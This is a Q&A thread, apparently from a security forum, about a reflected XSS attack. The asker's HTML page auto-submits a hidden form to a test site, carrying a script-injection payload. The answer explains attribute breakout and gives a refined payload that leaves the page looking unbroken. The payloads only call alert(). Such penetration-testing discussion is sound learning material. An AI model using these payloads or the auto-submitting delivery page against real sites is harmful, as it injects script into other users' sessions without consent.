# XSS: Character showing in DOM

Tags: web-application, penetration-test, xss, exploit, attacks

I have created an html page that redirects user to a test site that has an XSS vulnerability. I am able to successfully execute javascript via the vulnerability. However, I have found that some of the characters I am using as part of the XSS attack are displaying in the DOM. How can I hide these characters from showing in the DOM?

```
<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value='"><script>alert(3)</script>' />  
    </form>
  </body>
```

[image]

Comment: Can you be more clear, Also what type of XSS are you trying to exploit?

Comment: @Goron Reflective XSS. Not sure how else to be more clear. Why are the characters in the screenshot I provided showing in the DOM?

Comment: cause there must be a javascript function adding the characters into the dom

Comment: @VipulNair That is the code I am using. I do not have any other code/javascript function

Comment: value='"> here is the problem.

Comment: What can I place there instead to load the XSS script?

Answer (score 3):

You are likely injecting into something like this:

```
<input type="text" value="[payload]">
```

What you are currently doing is closing the `value` attribute with `"` and the `input` tag with `>`, and then adding your script payload:

```
<input type="text" value=""><script>alert(3)</script>">
```

If you don't want the DOM to look broken, you need to fix the remaining characters (`">`). These are not from your attack string, but the remaining ones from the legitimate tag the application is using.

One way to fix this would be to use the following payload:

```
"><script>alert(3)</script><x y="
```

This will now result in:

```
<input type="text" value=""><script>alert(3)</script><x y="">
```

Comment: Thanks for the response. Unfortunately that did not work for me. I found a workaround by escaping the `">` characters.